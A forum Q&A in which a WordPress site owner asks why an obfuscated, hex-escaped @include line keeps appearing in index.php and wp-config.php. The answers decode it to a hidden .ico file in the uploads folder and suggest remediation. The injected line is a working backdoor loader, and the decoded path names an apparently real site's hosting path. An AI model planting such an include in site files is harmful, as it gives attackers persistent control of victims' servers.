# Malware or Hack?

Tags: wordpress

The index.php and wpconfig.php files of my Wordpress project keep on getting the following lines added to them automatically, every few days:

```
/*85896*/

@include "\x2fser\x76ice\x73/we\x62pag\x65s/s\x2fs/s\x73gc.\x63om.\x70k/p\x75bli\x63/we\x62/wp\x2dcon\x74ent\x2fupl\x6fads\x2f.53\x334f5\x306.i\x63o";

/*85896*/
```

I can't figure out what is causing this. I've changed the FTP and account access passwords many times still these lines get added to the said files every other day. I've downloaded all my project files time and again and scanned them thoroughly and no virus or malware was detected.

What could be causing this?

Comment: Move this to the WordPress stack exchange site

Comment: Make sure your file is read-only too

Answer (score 0):

The include points to:

```
/services/webpages/s/s/ssgc.com.pk/public/web/wp-content/uploads/.5334f506.ico
```

Start by deleting the file and see what happens.

Check all your plugins/themes for security holes/updates. AND check any other sites that run in the same environment.

Comment: Also, since it's coming back, verify that you don't have any crontabs installed. Next I'd say reinstall wordpress and then remove any extensions that aren't reputable.